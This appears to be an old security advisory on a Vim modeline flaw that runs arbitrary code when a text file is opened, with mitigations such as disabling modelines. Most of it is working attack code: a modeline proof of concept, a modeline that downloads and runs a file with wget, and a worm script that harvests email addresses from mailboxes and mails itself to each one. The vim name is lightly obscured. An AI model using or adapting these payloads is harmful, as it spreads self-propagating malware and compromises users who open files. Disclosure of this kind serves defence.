|
Brought to you by:
Suppliers of:
|
|
|
| |
| A vulnerability in VIM has been found by Georgi Guninski that allows a remote attacker to cause the execution of arbitrary code whenever an unsuspecting user will open a text file. This is vulnerability can be further extended into a worm as illustrated below. |
| |
Credit:
Georgi Guninski's advisory can be found at:
http://www.guninski.com/vim1.html
The information has been provided by Nostradamus and Georgi Guninski.
|
| |
Protection:
Put the following in your ~/.vimrc or better in a system wide config file:
set modelines=0
It disables modelines without breaking significant functionality - there is no compatibility in this stuff between vim and emacs anyway.
Even when/if vim is fixed Georgi Guninski strongly recommends keeping this solution to prevent from similar exploits in the future.
Emacs addicts are recommended to disable local variables which may pose similar threat by putting the following in ~/.emacs
;; disable local variables
(setq enable-local-variables nil)
How it works:
There is a little bug in vi, which allows command execution.
The following two lines execute the ls command on target host, if the file is opened with vim. (Try it out with "vi viexpl.txt").
(In all of the below examples, the letter I of vim has been replaced with an !)
/* v!m:set foldmethod=expr: */
/* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","ls"),"ms_sux"): */
The output is:
-- START OF OUTPUT --
"viexpl.txt" 2L, 113CREADME TODO commands.sh commands.sh.long mail.txt proof.txt test.txt viexpl.txt viworm.txt worm.sh
ms_sux:
-- END OF OUTPUT
The worm use this bug to download a file to the /tmp directory.
-- START OF VIWORM FILE --
/* v!m:set foldmethod=expr: */
/* v!m:set foldexpr=confirm(libcall("/lib/libc.so.6","system","cd\ /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\ /tmp/joni8172ff3g;/tmp/joni8172ff3g"),"ms_sux"): */
-- END OF VIWORM FILE --
The above file does:
* Change to /tmp
* Download file joni8172ff3g to /tmp with wget from 127.0.0.1 (Change the IP to your webserver 127.0.0.1 is localhost).
* Make it executable with chmod 0755
* Execute the file
Here is the code of the downloaded file:
-- START OF FILE --
echo 'JuliaBabe1234@gmx.net'>>/var/spool/mail/$USER;echo 'CharlesBob1234@gmx.net'>>~/mbox;cat ~/mbox /var/spool/mail/*|grep '@'|cut -d ' ' -f 2|grep '@'|grep -v '<'|grep -v '"'|grep -v ','|sort|uniq > /tmp/h0oVeR183257;for i in `cat /tmp/h0oVeR183257`;do echo -e "/usr/sbin/sendmail $i <<EOFF\nSubject: Hi\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: attachment;
filename=\"concept.txt\"\n\n/* v!m:set foldmethod=expr: */\n/* v!m:set foldexpr=confirm(libcall(\"/lib/libc.so.6\",\"system\",\"cd\ /tmp;wget\ 127.0.0.1/joni8172ff3g;chmod\ 0755\ /tmp/joni8172ff3g;/tmp/joni8172ff3g\"),\"ms_sux\"): */\n\nEOFF">/tmp/f33lOe18352;. /tmp/f33lOe18352 2> /dev/null;done
-- END OF FILE --
* Set fake address for /var/spool/mail/$USER (if file not exist).
* Set fake address for ~/mbox (if file not exist).
* Get mail address with grep, grep -v from ~/mbox and /var/spool/mail/*
* Sort the stuff and make it unique (Only one file per address).
* Send a mail with sendmail for every address with Subject Hi, and attachment the viworm file (concept.txt).
* Execute all the stuff and send stderr to /dev/null
If the other users open the mail with the vi editor the wormfile is downloaded and executed.
|
|
|
|
|
